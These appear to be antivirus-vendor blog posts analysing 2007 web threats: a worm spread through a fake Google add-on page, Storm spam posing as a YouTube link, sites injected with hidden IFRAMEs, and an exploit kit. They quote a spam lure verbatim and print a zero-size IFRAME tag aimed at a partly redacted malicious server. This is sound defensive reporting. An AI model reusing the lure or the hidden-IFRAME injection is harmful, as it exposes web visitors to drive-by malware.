We all are familiar with IM worms and how they used different techniques in order to be downloaded and executed into a target machine.One of which is the WORM_SOHANAD (a.k.a worm_sohanat, worm_imaut, worm_autoit) which leverages on the MS06-014 MDAC vulnerability. There’s a previous blog entry regarding this malware here.

Today, I would like to show another twist of the social engineering used by this malware. This time the malware utilizes a fake Google page (shown below) where the hyperlinks found in the page points to the same web page and also contains a link to the malware itself.



As we can see on the web page, it says that we have to download an add-on which is actually a malware. Checking the source code of the page, we have three obfuscated scripts.





Which when deobfuscated results to:







The files “home.exe” and “zun.exe” are the same; Trend Micro already has detection as WORM_SOHANAT.CO while the other binary, “zin.exe”, is detected as WORM_VB.EIQ.

Another to note is that it appends some entries into the target user’s “hosts” file. This will result into being redirected to the malware web page upon accessing the web site listed.



Malware authors constantly modify or add malware techniques in order for their malware to get executed into the vulnerable users’ machines. However, users can be able to secure themselves from threats like this by applying security patches and updating their anti-virus signatures.

After ECARD.EXE, PATCH.EXE and MSDATAACCESS.EXE now comes VIDEO.EXE. Trend Micro Senior Threat Research Consultant Ivan Macalintal says it was just a matter of time.

He reports of receiving in his inbox what could be a rehash of the infamous Storm Trojan, a.k.a. NUWAR, which raged during the first quarter of this year and which has since been constantly evolving. Its latest trick is to piggyback on the popularity of YouTube, with spammed email messages containing links supposedly leading to a YouTube video file. The said email contains the following details:

Subject: are you kidding me? lol

Message body:
Man you have got to tell me where you picked her up. I saw this on the web, it has to be you. take a look, lol…
http://www.youtube.com/watch?v={BLOCKED}kBbE

Once a user falls for this social engineering technique and does click on the link, he/she is redirected to a certain IP address, in this case http://{BLOCKED}.190.132, which is obviously not YouTube but instead contains HTML script tags that use a YouTube logo and the following message:

Your Download Should Begin Shortly. If your download does not start in approximately 15 seconds, you can click here to launch the download and then press Run.

The link eventually leads users into downloading the malicious file named VIDEO.EXE.

TrendLabs detects the said file as WORM_ZHELATI.MAB. Users are advised to be wary of email messages of this nature.

TrendLabs has identified more Web pages that have been compromised to contain an IFRAME tag that redirects users to a malicious IP address, leading to the downloading of malicious files. The compromised Web pages, which Trend Micro detects as HTML_IFRAME.GN, point to news articles regarding new technologies and, ironically, about the latest malware threats. The said articles even include a report about the recent Monster.com attack.

The IFRAME tag that is inserted at the bottom of the page looks something like this:

<iframe src=’http://extracare.trendmicro-europe.com/tm/core/global/images/diary/9fcefefdb019fc3e623c52a5cc74d986_81.{BLOCKED}.27/go.php?sid=1′ style=’border:0px solid
gray;’ WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0
SCROLLING=no></iframe>

Trend Micro threat analysts report that this malicious IP address is owned by the Russian Business Network. At the time this attack was first reported, the downloaded files seem to be from Banker Trojan family and the data identified was requested from http:// 75.{BLOCKED}.148/.c/o/cfg.bin. As of this writing, however, it seems that it switched servers and is now attempting to download exploit codes, such as EXPL_EXECOD.A and EXPL_ANICMOO.GEN.

Meanwhile, TrendLabs has also discovered a new Web threat attack kit, which pretty much works the same way as Web Attacker, Mpack, or Icepack. This is very similar to the Web threat kit discussed in The 404 Story, but this time, we have found nine exploit pages instead of seven, all of which ultimately lead to the downloading of the malicious file, VERS.PHP, which Trend Micro detects as TROJ_DLOADER.PGW.

Based on the analysis by Senior Threat Expert Ivan Macalintal, the malicious obfuscated scripts at the exploit pages are still undetected. To make matters worse, the n404-X (where X is a number from 1 to 9) HTM pages evolve and change every other 5-10 minutes, thus producing more malicious pages (currently more than 130 sites and counting).

Further investigation reveals that the malicious domain is again hosted by none other than the Russian Business Network. This one also uses VBScript; however, this time it has randomized variables that are probably different every time. Threat analyst David Sancho also noted how there was not a single line of code visible in the first infectious HTML. “These people are making extra efforts to prevent automated detection of JavaScript decoders,” he says.

The complexity of its behavior makes it quite difficult to detect these pages because who knows how many more iterations and generations of malicious scripts can be produced. However, Trend Micro is continuously monitoring these malicious sites to include all undetected scripts and binaries to its signatures. Users are advised to watch out for these sites as they are still up and running as of this writing.